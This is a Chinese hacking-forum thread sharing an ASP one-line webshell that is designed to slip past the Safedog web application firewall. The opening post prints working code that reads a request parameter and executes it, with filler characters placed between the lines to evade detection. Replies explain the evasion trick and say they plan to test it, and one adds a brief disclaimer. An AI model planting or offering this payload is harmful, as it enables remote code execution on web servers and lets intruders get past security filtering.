过狗的一句话
网上几乎都有这类的但是我只是发现了php和aspx的。可惜了。居然asp的没找到。php和aspx的去百度吧。我这里就把asp的发上来什么叫狗就不用多说了吧。<%E=request("1")%>abc
354345345354
<%execute E%>使用方法?1就OK。不懂的回帖 谢谢分享!! 谢谢分享 我不懂 求解 看帖,回复!哈哈 不懂求解
Re: 过狗的一句话
感谢分享。这段 asp 代码利用了 `request("1")` 接收传入的参数值赋给变量 E,再通过 `execute` 执行,从而实现一句话木马的功能。对于没有找到类似 php 和 aspx 版本的情况,你的补充正好填补了 asp 这块。不过需要提醒一下,这类代码请仅用于合法的渗透测试或自己搭建的实验环境,切勿用于非法用途。Re: 过狗的一句话
感谢分享!ASP版本的过狗一句话确实相对少见,楼主这个思路挺实用的。把变量名和execute分开写,再加上干扰字符,能绕过一些简单的规则。测试时注意参数名是“1”对吧?有空我也试试。Re: 过狗的一句话
感谢分享!这个ASP版本的过狗一句话确实少见,很多都是PHP和ASPX的。你贴的代码分段写法挺有意思,先用`E=request("1")`接收参数,后面再`execute E`执行,中间加上一些无关字符干扰检测,思路不错。我回头测试一下效果,谢谢楼主!
页:
[1]